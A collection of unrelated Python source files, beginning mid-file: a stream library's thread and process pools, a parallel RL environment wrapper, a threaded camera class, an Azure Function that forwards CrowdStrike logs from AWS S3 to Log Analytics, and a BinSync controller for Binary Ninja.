super(ThreadPool, self).__init__()
self.function = function
self.inqueue = Queue.Queue()
self.outqueue = Queue.Queue()
self.failqueue = Queue.Queue()
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
def work():
input, dupinput = itertools.tee(_iterqueue(self.inqueue))
output = self.function(input, *args, **kwargs)
while 1:
try:
self.outqueue.put(next(output))
next(dupinput)
except StopIteration:
break
except Exception, e:
self.failqueue.put((next(dupinput), e))
self.worker_threads = []
for _ in range(poolsize):
t = threading.Thread(target=work)
self.worker_threads.append(t)
t.start()
def cleanup():
# Wait for all workers to finish,
# then signal the end of outqueue and failqueue.
for t in self.worker_threads:
t.join()
self.outqueue.put(StopIteration)
self.failqueue.put(StopIteration)
self.closed = True
self.cleaner_thread = threading.Thread(target=cleanup)
self.cleaner_thread.start()
self.iterator = _iterqueue(self.outqueue)
def __call__(self, inpipe):
if self.closed:
raise BrokenPipe('All workers are dead, refusing to summit jobs. '
'Use another Pool.')
def feed():
for item in inpipe:
self.inqueue.put(item)
self.inqueue.put(StopIteration)
self.feeder_thread = threading.Thread(target=feed)
self.feeder_thread.start()
return self.iterator
def join(self):
self.cleaner_thread.join()
def __repr__(self):
return '<ThreadPool(poolsize=%s) at %s>' % (self.poolsize, hex(id(self)))
class ProcessPool(Stream):
"""Work on the input stream asynchronously using a pool of processes.
>>> range(10) >> ProcessPool(map(lambda x: x*x)) >> sum
285
The pool object is an iterable over the output values. If an
input value causes an Exception to be raised, the tuple (value,
exception) is put into the pool's `failqueue`. The attribute
`failure` is a thead-safe iterator over the `failqueue`.
See also: Executor
"""
def __init__(self, function, poolsize=_nCPU, args=[], kwargs={}):
"""function: an iterator-processing function, one that takes an
iterator and return an iterator
"""
super(ProcessPool, self).__init__()
self.function = function
self.poolsize = poolsize
self.inqueue = multiprocessing.queues.SimpleQueue()
self.outqueue = multiprocessing.queues.SimpleQueue()
self.failqueue = multiprocessing.queues.SimpleQueue()
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
def work():
input, dupinput = itertools.tee(_iterqueue(self.inqueue))
output = self.function(input, *args, **kwargs)
while 1:
try:
self.outqueue.put(next(output))
next(dupinput)
except StopIteration:
break
except Exception, e:
self.failqueue.put((next(dupinput), e))
self.worker_processes = []
for _ in range(self.poolsize):
p = multiprocessing.Process(target=work)
self.worker_processes.append(p)
p.start()
def cleanup():
# Wait for all workers to finish,
# then signal the end of outqueue and failqueue.
for p in self.worker_processes:
p.join()
self.outqueue.put(StopIteration)
self.failqueue.put(StopIteration)
self.closed = True
self.cleaner_thread = threading.Thread(target=cleanup)
self.cleaner_thread.start()
self.iterator = _iterqueue(self.outqueue)
def __call__(self, inpipe):
if self.closed:
raise BrokenPipe('All workers are dead, refusing to summit jobs. '
'Use another Pool.')
def feed():
for item in inpipe:
self.inqueue.put(item)
self.inqueue.put(StopIteration)
self.feeder_thread = threading.Thread(target=feed)
self.feeder_thread.start()
return self.iterator
def join(self):
self.cleaner_thread.join()
def __repr__(self):
return '<ProcessPool(poolsize=%s) at %s>' % (self.poolsize, hex(id(self)))
class Executor(object):
"""Provide a fine-grained level of control over a ThreadPool or ProcessPool.
The constructor takes a pool class and arguments to its constructor::
>>> executor = Executor(ThreadPool, map(lambda x: x*x))
Job ids are returned when items are submitted::
>>> executor.submit(*range(10))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> executor.submit('foo')
10
A call to close() ends jobs submission. Workers threads/processes
are now allowed to terminate after all jobs are completed::
>>> executor.close()
The `result` and `failure` attributes are Stream instances and
thus iterable. The returned iterators behave as follow: their
next() calls will block until a next output is available, or
raise StopIteration if there is no more output. Thus we could use
the attributes `result` and `failure` like any other iterables::
>>> set(executor.result) == set([0, 1, 4, 9, 16, 25, 36, 49, 64, 81])
True
>>> list(executor.failure)
[('foo', TypeError("can't multiply sequence by non-int of type 'str'",))]
"""
def __init__(self, poolclass, function, poolsize=_nCPU, args=[], kwargs={}):
def process_job_id(input):
input, dupinput = itertools.tee(input)
id = iter(dupinput >> cut[0])
input = iter(input >> cut[1])
output = function(input, *args, **kwargs)
for item in output:
yield next(id), item
self.pool = poolclass(process_job_id,
poolsize=poolsize,
args=args,
kwargs=kwargs)
self.jobcount = 0
self._status = []
self.waitqueue = Queue.Queue()
if poolclass is ProcessPool:
self.resultqueue = multiprocessing.queues.SimpleQueue()
self.failqueue = multiprocessing.queues.SimpleQueue()
else:
self.resultqueue = Queue.Queue()
self.failqueue = Queue.Queue()
self.result = Stream(_iterqueue(self.resultqueue))
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
self.lock = threading.Lock()
## Acquired to submit and update job statuses.
self.sema = threading.BoundedSemaphore(poolsize)
## Used to throttle transfer from waitqueue to pool.inqueue,
## acquired by input_feeder, released by trackers.
def feed_input():
for id, item in _iterqueue(self.waitqueue):
self.sema.acquire()
with self.lock:
if self._status[id] == 'SUBMITTED':
self.pool.inqueue.put((id, item))
self._status[id] = 'RUNNING'
else:
self.sema.release()
self.pool.inqueue.put(StopIteration)
self.inputfeeder_thread = threading.Thread(target=feed_input)
self.inputfeeder_thread.start()
def track_result():
for id, item in self.pool:
self.sema.release()
with self.lock:
self._status[id] = 'COMPLETED'
self.resultqueue.put(item)
self.resultqueue.put(StopIteration)
self.resulttracker_thread = threading.Thread(target=track_result)
self.resulttracker_thread.start()
def track_failure():
for outval, exception in self.pool.failure:
self.sema.release()
id, item = outval
with self.lock:
self._status[id] = 'FAILED'
self.failqueue.put((item, exception))
self.failqueue.put(StopIteration)
self.failuretracker_thread = threading.Thread(target=track_failure)
self.failuretracker_thread.start()
def submit(self, *items):
"""Return job ids assigned to the submitted items."""
with self.lock:
if self.closed:
raise BrokenPipe('Job submission has been closed.')
id = self.jobcount
self._status += ['SUBMITTED'] * len(items)
self.jobcount += len(items)
for item in items:
self.waitqueue.put((id, item))
id += 1
if len(items) == 1:
return id - 1
else:
return range(id - len(items), id)
def cancel(self, *ids):
"""Try to cancel jobs with associated ids.
Return the actual number of jobs cancelled.
"""
ncancelled = 0
with self.lock:
for id in ids:
try:
if self._status[id] == 'SUBMITTED':
self._status[id] = 'CANCELLED'
ncancelled += 1
except IndexError:
pass
return ncancelled
def status(self, *ids):
"""Return the statuses of jobs with associated ids at the
time of call: either 'SUBMITED', 'CANCELLED', 'RUNNING',
'COMPLETED' or 'FAILED'.
"""
with self.lock:
if len(ids) > 1:
return [self._status[i] for i in ids]
else:
return self._status[ids[0]]
def close(self):
"""Signal that the executor will no longer accept job submission.
Worker threads/processes are now allowed to terminate after all
jobs have been are completed. Without a call to close(), they will
stay around forever waiting for more jobs to come.
"""
with self.lock:
if self.closed:
return
self.waitqueue.put(StopIteration)
self.closed = True
def join(self):
"""Note that the Executor must be close()'d elsewhere,
or join() will never return.
"""
self.inputfeeder_thread.join()
self.pool.join()
self.resulttracker_thread.join()
self.failuretracker_thread.join()
def shutdown(self):
"""Shut down the Executor. Suspend all waiting jobs.
Running workers will terminate after finishing their current job items.
The call will block until all workers are terminated.
"""
with self.lock:
self.pool.inqueue.put(StopIteration) # Stop the pool workers
self.waitqueue.put(StopIteration) # Stop the input_feeder
_iterqueue(self.waitqueue) >> item[-1] # Exhaust the waitqueue
self.closed = True
self.join()
def __repr__(self):
return '<Executor(%s, poolsize=%s) at %s>' % (self.pool.__class__.__name__,
self.pool.poolsize,
hex(id(self)))
#_____________________________________________________________________
# Collectors and Sorters
class PCollector(Stream):
"""Collect items from many ForkedFeeder's or ProcessPool's.
"""
def __init__(self):
self.inpipes = []
def selrecv():
while self.inpipes:
ready, _, _ = select.select(self.inpipes, [], [])
for inpipe in ready:
item = inpipe.recv()
if item is StopIteration:
del self.inpipes[self.inpipes.index(inpipe)]
else:
yield item
self.iterator = selrecv()
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<PCollector at %s>' % hex(id(self))
class _PCollector(Stream):
"""Collect items from many ForkedFeeder's or ProcessPool's.
All input pipes are polled individually. When none is ready, the
collector sleeps for a fix duration before polling again.
"""
def __init__(self, waittime=0.1):
"""waitime: the duration that the collector sleeps for
when all input pipes are empty
"""
self.inpipes = []
self.waittime = waittime
def pollrecv():
while self.inpipes:
ready = [p for p in self.inpipes if p.poll()]
for inpipe in ready:
item = inpipe.recv()
if item is StopIteration:
del self.inpipes[self.inpipes.index(inpipe)]
else:
yield item
self.iterator = pollrecv()
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<QCollector at %s>' % hex(id(self))
if sys.platform == "win32":
PCollector = _PCollector
class QCollector(Stream):
"""Collect items from many ThreadedFeeder's or ThreadPool's.
All input queues are polled individually. When none is ready, the
collector sleeps for a fix duration before polling again.
"""
def __init__(self, waittime=0.1):
"""waitime: the duration that the collector sleeps for
when all input pipes are empty
"""
self.inqueues = []
self.waittime = waittime
def nonemptyget():
while self.inqueues:
ready = [q for q in self.inqueues if not q.empty()]
if not ready:
time.sleep(self.waittime)
for q in ready:
item = q.get()
if item is StopIteration:
del self.inqueues[self.inqueues.index(q)]
else:
yield item
self.iterator = nonemptyget()
def __pipe__(self, inpipe):
self.inqueues.append(inpipe.outqueue)
def __repr__(self):
return '<QCollector at %s>' % hex(id(self))
class PSorter(Stream):
"""Merge sorted input (smallest to largest) coming from many
ForkedFeeder's or ProcessPool's.
"""
def __init__(self):
self.inpipes = []
def __iter__(self):
return heapq.merge(*__builtin__.map(_iterrecv, self.inpipes))
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<PSorter at %s>' % hex(id(self))
class QSorter(Stream):
"""Merge sorted input (smallest to largest) coming from many
ThreadFeeder's or ThreadPool's.
"""
def __init__(self):
self.inqueues = []
def __iter__(self):
return heapq.merge(*__builtin__.map(_iterqueue, self.inqueues))
def __pipe__(self, inpipe):
self.inqueues.append(inpipe.outqueue)
def __repr__(self):
return '<PSorter at %s>' % hex(id(self))
#_____________________________________________________________________
# Useful generator functions
def seq(start=0, step=1):
"""An arithmetic sequence generator. Works with any type with + defined.
>>> seq(1, 0.25) >> item[:10]
[1, 1.25, 1.5, 1.75, 2.0, 2.25, 2.5, 2.75, 3.0, 3.25]
"""
def seq(a, d):
while 1:
yield a
a += d
return seq(start, step)
def gseq(ratio, initval=1):
"""A geometric sequence generator. Works with any type with * defined.
>>> from decimal import Decimal
>>> gseq(Decimal('.2')) >> item[:4]
[1, Decimal('0.2'), Decimal('0.04'), Decimal('0.008')]
"""
while 1:
yield initval
initval *= ratio
def repeatcall(func, *args):
"""Repeatedly call func(*args) and yield the result.
Useful when func(*args) returns different results, esp. randomly.
"""
return itertools.starmap(func, itertools.repeat(args))
def chaincall(func, initval):
"""Yield func(initval), func(func(initval)), etc.
>>> chaincall(lambda x: 3*x, 2) >> take(10)
Stream([2, 6, 18, 54, 162, 486, 1458, 4374, 13122, 39366])
"""
x = initval
while 1:
yield x
x = func(x)
#_____________________________________________________________________
# Useful curried versions of __builtin__.{max, min, reduce}
def maximum(key):
"""
Curried version of the built-in max.
>>> Stream([3, 5, 28, 42, 7]) >> maximum(lambda x: x%28)
42
"""
return lambda s: max(s, key=key)
def minimum(key):
"""
Curried version of the built-in min.
>>> Stream([[13, 52], [28, 35], [42, 6]]) >> minimum(lambda v: v[0] + v[1])
[42, 6]
"""
return lambda s: min(s, key=key)
def reduce(function, initval=None):
"""
Curried version of the built-in reduce.
>>> reduce(lambda x,y: x+y)( [1, 2, 3, 4, 5] )
15
"""
if initval is None:
return lambda s: __builtin__.reduce(function, s)
else:
return lambda s: __builtin__.reduce(function, s, initval)
#_____________________________________________________________________
# main
if __name__ == "__main__":
import doctest
if doctest.testmod()[0]:
import sys
sys.exit(1)
|
subproc_vec_env.py
|
"""
Adapted from https://github.com/openai/baselines/
"""
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
parent_remote.close()
envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
try:
while True:
cmd, data = remote.recv()
if cmd == "step":
remote.send([envs[i].step(data[i]) for i in range(len(envs))])
elif cmd == "reset":
remote.send([env.reset() for env in envs])
elif cmd == "reset_mdp":
remote.send([env.reset_mdp() for env in envs])
elif cmd == "set_task":
remote.send([env.set_task(task) for env, task in zip(envs, data)])
elif cmd == "get_task":
remote.send([env.get_task() for env in envs])
elif cmd == "render":
remote.send([env.render(data) for env in envs])
elif cmd == "close":
remote.close()
break
elif cmd == "get_dataset":
remote.send(envs[0].get_dataset())
elif cmd == "get_spaces_spec":
remote.send(
CloudpickleWrapper(
(
envs[0].observation_space,
envs[0].action_space,
envs[0].task_size,
envs[0].task_classify,
)
)
)
else:
raise NotImplementedError
except KeyboardInterrupt:
print("SubprocVecEnv worker: got KeyboardInterrupt")
finally:
for env in envs:
env.close()
class SubprocVecEnv(VecEnv):
"""
VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None, context="spawn", in_series=1):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
in_series: number of environments to run in series in a single process
(e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
"""
self.waiting = False
self.closed = False
self.in_series = in_series
nenvs = len(env_fns)
assert (
nenvs % in_series == 0
), "Number of envs must be divisible by number of envs to run in series"
self.nremotes = nenvs // in_series
env_fns = np.array_split(env_fns, self.nremotes)
ctx = mp.get_context(context)
self.remotes, self.work_remotes = zip(
*[ctx.Pipe() for _ in range(self.nremotes)]
)
self.ps = [
ctx.Process(
target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))
)
for (work_remote, remote, env_fn) in zip(
self.work_remotes, self.remotes, env_fns
)
]
for p in self.ps:
p.daemon = (
True # if the main process crashes, we should not cause things to hang
)
with clear_mpi_env_vars():
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(("get_spaces_spec", None))
observation_space, action_space, task_size, task_classify = (
self.remotes[0].recv().x
)
self.task_size = task_size
self.task_classify = task_classify
self.viewer = None
VecEnv.__init__(self, nenvs, observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
actions = np.array_split(actions, self.nremotes)
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
results = _flatten_list(results)
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews).reshape(-1, 1), np.stack(dones), infos
def reset(self, task=None):
self._assert_not_closed()
for remote in self.remotes:
remote.send(("reset", task))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def reset_mdp(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(("reset_mdp", None))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def get_task(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(("get_task", None))
tasks = [remote.recv() for remote in self.remotes]
tasks = _flatten_list(tasks)
return np.stack(tasks)
def set_task(self, tasks):
self._assert_not_closed()
tasks = np.array_split(tasks, self.nremotes)
for remote, task in zip(self.remotes, tasks):
remote.send(("set_task", task))
[remote.recv() for remote in self.remotes]
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for p in self.ps:
p.join()
def get_images(self, resolution):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(("render", resolution))
imgs = [pipe.recv() for pipe in self.remotes]
imgs = _flatten_list(imgs)
return imgs
def get_dataset(self):
self._assert_not_closed()
self.remotes[0].send(("get_dataset", None))
return self.remotes[0].recv()
@property
def _goal(self):
return self.get_task()
def get_all_task_idx(self):
return range(self.task_size)
def _assert_not_closed(self):
assert (
not self.closed
), "Trying to operate on a SubprocVecEnv after calling close()"
def __del__(self):
if not self.closed:
self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
|
base_camera.py
|
import time
import logging
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
# configure logging system
logging.basicConfig(format='%(asctime)s :: %(message)s',
filename='log.txt',
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
READ_FRAME_TIMER = time.time()
READ_FRAME_COUNTER = 0
READ_FRAME_RATEMEAS = 0.0
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
event = CameraEvent()
def __init__(self):
self.thread = None # background thread that reads frames from camera
self.frame = None # current frame is stored here by background thread
self.last_access = 0 # time of last client access to the camera
self.rlock = threading.RLock()
self.settings = {}
self.settings['timeout'] = 1.0
self.flg = {}
self.flg['kill_thread'] = False
"""Start the background camera thread if it isn't running yet."""
if self.thread is None: #TODO: delete this code
# start background frame thread
self.start_camera()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def start_camera(self):
self.last_access = time.time()
# start background frame thread
self.thread = threading.Thread(target=self._thread)
self.thread.start()
def kill_thread(self):
print("base_camera.py: cleanly killing the camera thread!")
self.flg['kill_thread'] = True
def get_frame(self):
"""Return the current camera frame."""
# auto-start the camera as needed
self.rlock.acquire()
if self.thread is None:
self.start_camera()
if not self.thread.isAlive():
self.thread.start()
self.rlock.release()
# wait for a signal from the camera thread
self.last_access = time.time()
BaseCamera.event.wait()
BaseCamera.event.clear()
# self.frame was updated in the background thread
return self.frame
def frames(self):
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
def get_error_status(self):
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
def _thread(self):
"""Camera background thread."""
#print('Starting camera thread.')
global READ_FRAME_TIMER, READ_FRAME_COUNTER, READ_FRAME_RATEMEAS
frames_iterator = self.frames()
for frame in frames_iterator:
if frame is not None:
# shared variable: image data
self.frame = frame
# signal to baseclass that the frame has been captured,
# and that self.frame contains fresh data
BaseCamera.event.set()
# if there hasn't been any clients asking for frames in
# the last x seconds then stop the thread
if self.flg['kill_thread'] or \
(time.time() - self.last_access) > self.settings['timeout']:
#print('Stopping camera thread due to inactivity.')
self.flg['kill_thread'] = False
frames_iterator.close()
self.cleanup()
break
# print out rate data
delta_time = time.time() - READ_FRAME_TIMER
READ_FRAME_RATEMEAS += (1/delta_time) / (30*5)
READ_FRAME_TIMER = time.time()
READ_FRAME_COUNTER += 1
if READ_FRAME_COUNTER >= (30*5):
print('base_camera.py: reading data at %.1fHz' % (READ_FRAME_RATEMEAS))
#logging.debug("rate = %.1fHz" % (READ_FRAME_RATEMEAS) )
READ_FRAME_COUNTER = 0
READ_FRAME_RATEMEAS = 0.0
READ_FRAME_TIMER = time.time()
else:
#error = self.get_error_status()
self.frame = None
BaseCamera.event.set() # send signal to clients
frames_iterator.close()
print('base_camera.py: Error. Killing camera thread.')
break
self.rlock.acquire()
self.thread = None
self.rlock.release()
|
__init__.py
|
import boto3
import json
import datetime
from botocore.config import Config as BotoCoreConfig
import tempfile
import os
import gzip
import time
import base64
import hashlib
import hmac
import requests
import threading
import azure.functions as func
import logging
import re
customer_id = os.environ['WorkspaceID']
shared_key = os.environ['WorkspaceKey']
log_type = "CrowdstrikeReplicatorLogs"
AWS_KEY = os.environ['AWS_KEY']
AWS_SECRET = os.environ['AWS_SECRET']
AWS_REGION_NAME = os.environ['AWS_REGION_NAME']
QUEUE_URL = os.environ['QUEUE_URL']
VISIBILITY_TIMEOUT = 60
temp_dir = tempfile.TemporaryDirectory()
if 'logAnalyticsUri' in os.environ:
logAnalyticsUri = os.environ['logAnalyticsUri']
pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$"
match = re.match(pattern,str(logAnalyticsUri))
if not match:
raise Exception("Invalid Log Analytics Uri.")
else:
logAnalyticsUri = "https://" + customer_id + ".ods.opinsights.azure.com"
def get_sqs_messages():
logging.info("Creating SQS connection")
sqs = boto3.resource('sqs', region_name=AWS_REGION_NAME, aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)
queue = sqs.Queue(url=QUEUE_URL)
logging.info("Queue connected")
for msg in queue.receive_messages(VisibilityTimeout=VISIBILITY_TIMEOUT):
msg_body = json.loads(msg.body)
ts = datetime.datetime.utcfromtimestamp(msg_body['timestamp'] / 1000).strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
logging.info("Start processing bucket {0}: {1} files with total size {2}, bucket timestamp: {3}".format(msg_body['bucket'],msg_body['fileCount'],msg_body['totalSize'],ts))
if "files" in msg_body:
if download_message_files(msg_body) is True:
msg.delete()
def process_message_files():
for file in files_for_handling:
process_file(file)
def download_message_files(msg):
try:
msg_output_path = os.path.join(temp_dir.name, msg['pathPrefix'])
if not os.path.exists(msg_output_path):
os.makedirs(msg_output_path)
for s3_file in msg['files']:
s3_path = s3_file['path']
local_path = os.path.join(temp_dir.name, s3_path)
logging.info("Start downloading file {}".format(s3_path))
s3_client.download_file(msg['bucket'], s3_path, local_path)
if check_damaged_archive(local_path) is True:
logging.info("File {} successfully downloaded.".format(s3_path))
files_for_handling.append(local_path)
else:
logging.warn("File {} damaged. Unpack ERROR.".format(s3_path))
return True
except Exception as ex:
logging.error("Exception in downloading file from S3. Msg: {0}".format(str(ex)))
return False
def check_damaged_archive(file_path):
chunksize = 1024*1024 # 10 Mbytes
with gzip.open(file_path, 'rb') as f:
try:
while f.read(chunksize) != '':
return True
except:
return False
def process_file(file_path):
global processed_messages_success, processed_messages_failed
processed_messages_success = 0
processed_messages_failed = 0
size = 1024*1024
# unzip archive to temp file
out_tmp_file_path = file_path.replace(".gz", ".tmp")
with gzip.open(file_path, 'rb') as f_in:
with open(out_tmp_file_path, 'wb') as f_out:
while True:
data = f_in.read(size)
if not data:
break
f_out.write(data)
os.remove(file_path)
threads = []
with open(out_tmp_file_path) as file_handler:
for data_chunk in split_chunks(file_handler):
chunk_size = len(data_chunk)
logging.info("Processing data chunk of file {} with {} events.".format(out_tmp_file_path, chunk_size))
data = json.dumps(data_chunk)
t = threading.Thread(target=post_data, args=(data, chunk_size))
threads.append(t)
t.start()
for t in threads:
t.join()
logging.info("File {} processed. {} events - successfully, {} events - failed.".format(file_path, processed_messages_success,processed_messages_failed))
os.remove(out_tmp_file_path)
def split_chunks(file_handler, chunk_size=15000):
chunk = []
for line in file_handler:
chunk.append(json.loads(line))
if len(chunk) == chunk_size:
yield chunk
chunk = []
if chunk:
yield chunk
def build_signature(customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id,encoded_hash)
return authorization
def post_data(body,chunk_count):
global processed_messages_success, processed_messages_failed
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = logAnalyticsUri + resource + "?api-version=2016-04-01"
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(uri,data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
processed_messages_success = processed_messages_success + chunk_count
logging.info("Chunk with {} events was processed and uploaded to Azure".format(chunk_count))
else:
processed_messages_failed = processed_messages_failed + chunk_count
logging.warn("Problem with uploading to Azure. Response code: {}".format(response.status_code))
def cb_rename_tmp_to_json(file_path, file_size, lines_count):
out_file_name = file_path.replace(".tmp", ".json")
os.rename(file_path, out_file_name)
def create_s3_client():
try:
boto_config = BotoCoreConfig(region_name=AWS_REGION_NAME)
return boto3.client('s3', region_name=AWS_REGION_NAME, aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET, config=boto_config)
except Exception as ex:
logging.error("Connect to S3 exception. Msg: {0}".format(str(ex)))
return None
s3_client = create_s3_client()
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
logging.info(logAnalyticsUri)
global files_for_handling
files_for_handling = []
get_sqs_messages()
process_message_files()
|
controller.py
|
# ----------------------------------------------------------------------------
# This file contains the BinSyncController class which acts as the the
# bridge between the plugin UI and direct calls to the binsync client found in
# the core of binsync. In the controller, you will find code used to make
# pushes and pulls of user changes.
#
# You will also notice that the BinSyncController runs two extra threads in
# it:
# 1. BinSync "git pulling" thread to constantly get changes from others
# 2. Command Routine to get hooked changes to IDA attributes
#
# The second point is more complicated because it acts as the queue of
# runnable actions that are queued from inside the hooks.py file.
# Essentially, every change that happens in IDA from the main user triggers
# a hook which will push an action to be preformed onto the command queue;
# Causing a "git push" on every change.
#
# ----------------------------------------------------------------------------
from functools import wraps
import re
import threading
import time
import datetime
import logging
from typing import Dict, List, Tuple, Optional, Iterable, Any
from collections import OrderedDict, defaultdict
from PySide2.QtWidgets import QDialog, QMessageBox
from binaryninjaui import (
UIContext,
DockHandler,
DockContextHandler,
UIAction,
UIActionHandler,
Menu,
)
import binaryninja
from binaryninja.interaction import show_message_box
from binaryninja.enums import MessageBoxButtonSet, MessageBoxIcon, VariableSourceType
import binsync
from binsync import Client, ConnectionWarnings, StateContext, State
from binsync.data import StackVariable, StackOffsetType, Function, Struct, Comment
_l = logging.getLogger(name=__name__)
#
# Decorators
#
def init_checker(f):
@wraps(f)
def initcheck(self, *args, **kwargs):
if not self.check_client():
raise RuntimeError("Please connect to a repo first.")
return f(self, *args, **kwargs)
return initcheck
def make_state(f):
"""
Build a writeable State instance and pass to `f` as the `state` kwarg if the `state` kwarg is None.
Function `f` should have have at least two kwargs, `user` and `state`.
"""
@wraps(f)
def state_check(self, *args, **kwargs):
state = kwargs.pop('state', None)
user = kwargs.pop('user', None)
if state is None:
state = self.client.get_state(user=user)
kwargs['state'] = state
r = f(self, *args, **kwargs)
state.save()
else:
kwargs['state'] = state
r = f(self, *args, **kwargs)
# try:
# if isinstance(args[0], int):
# self._update_function_name_if_none(args[0], user=user, state=state)
# except Exception:
# print(f"[BinSync]: failed to auto set function name for {hex(args[0])}.")
# pass
return r
return state_check
def make_ro_state(f):
"""
Build a read-only State instance and pass to `f` as the `state` kwarg if the `state` kwarg is None.
Function `f` should have have at least two kwargs, `user` and `state`.
"""
@wraps(f)
def state_check(self, *args, **kwargs):
state = kwargs.pop('state', None)
user = kwargs.pop('user', None)
if state is None:
state = self.client.get_state(user=user)
kwargs['state'] = state
kwargs['user'] = user
return f(self, *args, **kwargs)
return state_check
#
# Wrapper Classes
#
class SyncControlStatus:
CONNECTED = 0
CONNECTED_NO_REMOTE = 1
DISCONNECTED = 2
#
# Controller
#
class BinsyncController:
def __init__(self):
self.client = None # type: binsync.Client
# === UI update things ===
self.info_panel = None
self._last_reload = time.time()
# start the pull routine
self.pull_thread = threading.Thread(target=self.pull_routine)
self.pull_thread.setDaemon(True)
self.pull_thread.start()
self.curr_bv = None
self.curr_func = None
#
# Multithreaded Stuff
#
def pull_routine(self):
while True:
# pull the repo every 10 seconds
if self.check_client() and self.client.has_remote \
and (
self.client._last_pull_attempt_at is None
or (datetime.datetime.now() - self.client._last_pull_attempt_at).seconds > 10
):
# Pull new items
self.client.pull()
if self.check_client():
# reload curr window fast
#if self.client.has_remote:
# self.client.init_remote()
#users = list(self.users())
#if self.info_panel:
# self.info_panel.reload_curr(users)
# reload info panel every 10 seconds
if self.info_panel is not None and time.time() - self._last_reload > 5:
try:
self._last_reload = time.time()
self.info_panel.reload()
except RuntimeError:
# the panel has been closed
self.info_panel = None
# Snooze
time.sleep(1)
#
# State Interaction Functions
#
def connect(self, user, path, init_repo=False, remote_url=None):
binary_md5 = "" #TODO: how to get the md5 in Binja
self.client = Client(user, path, binary_md5,
init_repo=init_repo,
remote_url=remote_url,
)
BinsyncController._parse_and_display_connection_warnings(self.client.connection_warnings)
print(f"[BinSync]: Client has connected to sync repo with user: {user}.")
def check_client(self, message_box=False):
if self.client is None:
if message_box:
QMessageBox.critical(
None,
"BinSync: Error",
"BinSync client does not exist.\n"
"You haven't connected to a binsync repo. Please connect to a binsync repo first.",
QMessageBox.Ok,
)
return False
